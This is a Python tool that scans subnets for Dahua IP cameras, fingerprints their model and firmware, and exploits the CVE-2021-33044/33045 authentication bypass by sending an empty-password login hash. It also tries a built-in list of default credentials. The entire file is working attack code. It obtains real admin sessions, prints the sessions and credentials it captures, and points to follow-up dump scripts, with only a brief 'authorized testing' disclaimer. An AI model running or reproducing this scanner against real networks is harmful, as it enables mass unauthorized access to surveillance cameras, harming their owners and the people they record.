#!/usr/bin/env python3 """ Dahua IP Camera Network Scanner ================================ CVE-2021-33044 / CVE-2021-33045 Auto-Detection Scans a subnet (or single host) for Dahua cameras, fingerprints them via RPC2 and CGI endpoints, checks for authentication bypass vulnerabilities, and prints a structured summary table. WARNING: For authorized security testing and educational purposes only. Do not use against devices without explicit permission. Usage: python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081 python dahua_scanner.py 192.168.1.100:8081 python dahua_scanner.py 192.168.1.0/24 -p 80 8000 8080 -w 100 -o results.json Output: - Live progress per host - ASCII table of discovered cameras - Optional JSON output with full details """ import argparse import concurrent.futures import hashlib import ipaddress import json import socket import sys import threading import time from datetime import datetime import requests requests.packages.urllib3.disable_warnings() # # Defaults # COMMON_PORTS = [80, 8000, 8080, 8081, 8888, 9000, 443, 37777] # Suggestion only DEFAULT_THREADS = 50 DEFAULT_TIMEOUT = 5 DAHUA_SIGNATURES = [ "dahua", "DH-IPC", "IPC-HDBW", "IPC-HDW", "IPC-HUM", "/doc/page/login.asp", "NetVideoActiveX", "RPC2_Login", "loginPage", "NVR", "XVR", "DahuaWeb", ] DEFAULT_CREDS = [ ("admin", ""), ("admin", "admin"), ("admin", "888888"), ("admin", "666666"), ("admin", "123456"), ("666666", "666666"), ("888888", "888888"), ] # # RPC2 helpers # def rpc2_challenge(target, port, timeout, http=None): url = f"http://{target}:{port}/RPC2_Login" try: r = (http or requests).post(url, json={ "method": "global.login", "params": {"userName": "admin", "password": "", "clientType": "Web3.0", "loginType": "Direct", "authorityType": "Default", "passwordType": "Default"}, "id": 1, "session": 0 }, timeout=timeout, verify=False) data = r.json() p = data.get("params", {}) return p.get("realm", ""), p.get("random", ""), data.get("session", 0) except Exception: return None, None, 0 def _md5hash(s): return hashlib.md5(s.encode()).hexdigest().upper() def bypass_hash(user, realm, rnd): """CVE-2021-33044/45: empty-password step1.""" s1 = _md5hash(f"{user}:{realm}:") return _md5hash(f"{s1}:{rnd}:{s1}") def legit_hash(user, pw, realm, rnd): s1 = _md5hash(f"{user}:{realm}:{pw}") return _md5hash(f"{s1}:{rnd}:{s1}") def rpc2_login(target, port, user, pw_hash, session, timeout, http=None): try: r = (http or requests).post(f"http://{target}:{port}/RPC2_Login", json={ "method": "global.login", "params": {"userName": user, "password": pw_hash, "clientType": "Web3.0", "loginType": "Direct", "authorityType": "Default", "passwordType": "Default"}, "id": 2, "session": session }, timeout=timeout, verify=False) return r.json() except Exception: return {} # # Detection & fingerprinting # def port_open(ip, port, timeout): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(timeout) result = s.connect_ex((str(ip), port)) s.close() return result == 0 except Exception: return False def is_dahua(ip, port, timeout): """Return True if HTTP response contains any Dahua signature.""" scheme = "https" if port == 443 else "http" try: r = requests.get(f"{scheme}://{ip}:{port}/", timeout=timeout, verify=False, allow_redirects=True) body_low = r.text.lower() if any(sig.lower() in body_low for sig in DAHUA_SIGNATURES): return True server = r.headers.get("Server", "").lower() if "dahua" in server or "netsurveillance" in server: return True except Exception: pass # Try RPC2 endpoint Dahua-specific try: r = requests.post(f"http://{ip}:{port}/RPC2_Login", json={"method": "global.login", "params": {"userName": "x", "password": "", "clientType": "Web3.0", "authorityType": "Default", "passwordType": "Default"}, "id": 1}, timeout=timeout, verify=False) data = r.json() # Dahua always returns params.realm and params.random on step-1 if "realm" in data.get("params", {}): return True except Exception: pass return False def fingerprint(ip, port, timeout): """Pull device type and firmware version via CGI or HTTP headers.""" base = f"http://{ip}:{port}" result = {"model": "Unknown", "firmware": "Unknown", "serial": "Unknown", "device_id": ""} # Try CGI endpoints (requires auth on most devices) try: r = requests.get(f"{base}/cgi-bin/magicBox.cgi?action=getDeviceType", timeout=timeout, verify=False) if r.status_code == 200 and r.text.strip() and '401' not in r.text: result["model"] = r.text.strip()[:50] except Exception: pass try: r = requests.get(f"{base}/cgi-bin/magicBox.cgi?action=getSoftwareVersion", timeout=timeout, verify=False) if r.status_code == 200 and r.text.strip() and '401' not in r.text: result["firmware"] = r.text.strip()[:50] except Exception: pass try: r = requests.get(f"{base}/cgi-bin/magicBox.cgi?action=getSerialNo", timeout=timeout, verify=False) if r.status_code == 200 and r.text.strip() and '401' not in r.text: result["serial"] = r.text.strip()[:30] except Exception: pass # Fallback: extract device_id from RPC2 realm + firmware date from headers if result["model"] == "Unknown" or result["firmware"] == "Unknown": try: # Get firmware date from Last-Modified header r = requests.get(f"{base}/", timeout=timeout, verify=False) last_mod = r.headers.get("Last-Modified", "") if last_mod and result["firmware"] == "Unknown": result["firmware"] = f"~{last_mod[:16]}" except Exception: pass try: # Get device ID from RPC2 realm r = requests.post(f"{base}/RPC2_Login", json={ "method": "global.login", "params": {"userName": "x", "password": "", "clientType": "Web3.0", "loginType": "Direct", "authorityType": "Default", "passwordType": "Default"}, "id": 1, "session": 0 }, timeout=timeout, verify=False) data = r.json() realm = data.get("params", {}).get("realm", "") # Realm format: "Login to " if "Login to " in realm: result["device_id"] = realm.split("Login to ")[1][:32] if result["model"] == "Unknown": result["model"] = f"Dahua-{result['device_id'][:8]}" except Exception: pass return result # # Vulnerability checks # def check_bypass(ip, port, timeout): """CVE-2021-33044/45: returns session_id if vulnerable, else None.""" http = requests.Session() http.verify = False realm, rnd, sess = rpc2_challenge(ip, port, timeout, http=http) if not realm: return None bh = bypass_hash("admin", realm, rnd) resp = rpc2_login(ip, port, "admin", bh, sess, timeout, http=http) if resp.get("result") is True: return resp.get("session", "UNKNOWN") return None def check_default_creds(ip, port, timeout): """Returns (user, pass, session) of first matching default cred, or None.""" http = requests.Session() http.verify = False realm, rnd, sess = rpc2_challenge(ip, port, timeout, http=http) if not realm: return None for user, pw in DEFAULT_CREDS: resp = rpc2_login(ip, port, user, legit_hash(user, pw, realm, rnd), sess, timeout, http=http) if resp.get("result") is True: return user, pw, resp.get("session") return None # # Per-host scan # def scan_host(ip, ports, timeout, verbose): ip = str(ip) for port in ports: if not port_open(ip, port, timeout): continue if not is_dahua(ip, port, timeout): continue # Found a Dahua device gather full info info = fingerprint(ip, port, timeout) camera = { "ip": ip, "port": port, "model": info["model"], "firmware": info["firmware"], "serial": info["serial"], "device_id": info.get("device_id", ""), "bypass": None, # session_id or None "default": None, # (user, pass, session) or None "cves": [], } session = check_bypass(ip, port, timeout) if session: camera["bypass"] = session camera["cves"].append("CVE-2021-33044/45") cred = check_default_creds(ip, port, timeout) if cred: camera["default"] = cred if verbose: vuln = ", ".join(camera["cves"]) if camera["cves"] else "none detected" print(f" [+] {ip}:{port} model={camera['model']} fw={camera['firmware']} vulns={vuln}") return camera return None # # Network scan # def scan_network(network, ports, threads, timeout, verbose): try: net = ipaddress.ip_network(network, strict=False) hosts = list(net.hosts()) if net.num_addresses > 2 else [net.network_address] except ValueError: # Single IP (strip port if given as ip:port — port already in ports list) host = network.split(":")[0] if ":" in network and "/" not in network else network try: hosts = [ipaddress.ip_address(host)] except ValueError: print(f"[-] Invalid target: {network}", file=sys.stderr) sys.exit(1) total = len(hosts) lock = threading.Lock() found = [] scanned = [0] def worker(ip): result = scan_host(ip, ports, timeout, verbose) with lock: scanned[0] += 1 done = scanned[0] if result: found.append(result) if not verbose: pct = int(done / total * 40) bar = "#" * pct + "." * (40 - pct) print(f"\r [{bar}] {done}/{total}", end="", flush=True) with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as ex: ex.map(worker, hosts) if not verbose: print() # newline after progress bar return found # # Output # def print_banner(network, ports, threads, timeout): print(""" Dahua Camera Network Scanner CVE-2021-33044 / CVE-2021-33045 auto-check """) print(f" Target : {network}") print(f" Ports : {ports}") print(f" Threads : {threads} Timeout: {timeout}s") print(f" Started : {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n") def print_table(cameras): if not cameras: print("\n [-] No Dahua cameras found.\n") return col_ip = max(len(c["ip"]) for c in cameras) col_port = max(len(str(c["port"])) for c in cameras) col_mod = max(len(c["model"]) for c in cameras) col_fw = max(len(c["firmware"]) for c in cameras) col_ip = max(col_ip, 9) col_port = max(col_port, 4) col_mod = max(col_mod, 8) col_fw = max(col_fw, 8) col_vuln = 24 sep = (f" +-{'-'*col_ip}-+-{'-'*col_port}-+-{'-'*col_mod}-+-" f"{'-'*col_fw}-+-{'-'*col_vuln}-+") hdr = (f" | {'IP':<{col_ip}} | {'PORT':<{col_port}} | {'MODEL':<{col_mod}} | " f"{'FIRMWARE':<{col_fw}} | {'VULNERABILITIES':<{col_vuln}} |") print(f"\n Found {len(cameras)} Dahua camera(s):\n") print(sep) print(hdr) print(sep) for c in cameras: vuln_parts = list(c["cves"]) if c["default"]: vuln_parts.append(f"creds:{c['default'][0]}:{c['default'][1]!r}") vuln_str = ", ".join(vuln_parts) if vuln_parts else "none" print(f" | {c['ip']:<{col_ip}} | {c['port']:<{col_port}} | " f"{c['model']:<{col_mod}} | {c['firmware']:<{col_fw}} | " f"{vuln_str:<{col_vuln}} |") print(sep) # Highlight critical findings print() for c in cameras: if c["bypass"]: print(f" [!!!] BYPASS VULN {c['ip']}:{c['port']} session={c['bypass']}") print(f" -> python dahua_auth_bypass.py {c['ip']} -p {c['port']} --dump") elif c["default"]: u, p, _ = c["default"] print(f" [!] DEFAULT CREDS {c['ip']}:{c['port']} {u}:{p!r}") print(f" -> python dahua_auth_bypass.py {c['ip']} -p {c['port']} --dump") else: print(f" [i] {c['ip']}:{c['port']} no auth issues (run full scan: python dahua_exploit.py {c['ip']})") print() def save_json(cameras, path): out = [] for c in cameras: row = dict(c) if row["default"]: row["default"] = {"user": row["default"][0], "pass": row["default"][1], "session": row["default"][2]} out.append(row) with open(path, "w") as f: json.dump({"scan_time": datetime.now().isoformat(), "cameras": out}, f, indent=2) print(f" [+] Results saved {path}") # # CLI # def main(): parser = argparse.ArgumentParser( description="Dahua IP Camera Network Scanner - CVE-2021-33044/33045 Detection", formatter_class=argparse.RawDescriptionHelpFormatter, epilog=f""" Examples: python dahua_scanner.py 192.168.1.0/24 -p 80 8080 8081 python dahua_scanner.py 192.168.1.100:8081 python dahua_scanner.py 192.168.1.0/24 -p 80 8000 8080 -w 100 -v python dahua_scanner.py 10.0.0.0/24 -p 80 443 8080 -o results.json Common Dahua ports: {COMMON_PORTS} WARNING: For authorized security testing only. Do not use without permission. """ ) parser.add_argument("network", help="Subnet (192.168.1.0/24) or single IP (192.168.1.1:8081)") parser.add_argument("-p", "--ports", nargs="+", type=int, default=None, help=f"Ports to scan (required unless using IP:port format). Common: {COMMON_PORTS}") parser.add_argument("-w", "--threads", type=int, default=DEFAULT_THREADS, help=f"Concurrent threads (default: {DEFAULT_THREADS})") parser.add_argument("-t", "--timeout", type=int, default=DEFAULT_TIMEOUT, help=f"Per-connection timeout in seconds (default: {DEFAULT_TIMEOUT})") parser.add_argument("-o", "--output", help="Save results to JSON file") parser.add_argument("-v", "--verbose", action="store_true", help="Print each camera as discovered (instead of progress bar)") args = parser.parse_args() # Support host:port shorthand: dahua_scanner.py 192.168.1.1:8081 if ":" in args.network and "/" not in args.network: host, port_str = args.network.rsplit(":", 1) try: extra_port = int(port_str) args.network = host if args.ports is None: args.ports = [extra_port] elif extra_port not in args.ports: args.ports = [extra_port] + args.ports except ValueError: pass # Require ports to be specified if args.ports is None: print(f"\n [!] ERROR: No ports specified.") print(f" [i] Use -p to specify ports, e.g.: -p 80 8080 8081") print(f" [i] Or use IP:port format, e.g.: 192.168.1.100:8081") print(f" [i] Common Dahua ports: {COMMON_PORTS}") print(f"\n Run with --help for full usage.\n") sys.exit(1) print_banner(args.network, args.ports, args.threads, args.timeout) t0 = time.time() cameras = scan_network(args.network, args.ports, args.threads, args.timeout, args.verbose) elapsed = time.time() - t0 print_table(cameras) print(f" Scan finished in {elapsed:.1f}s") if args.output: save_json(cameras, args.output) sys.exit(0 if cameras else 1) if __name__ == "__main__": main()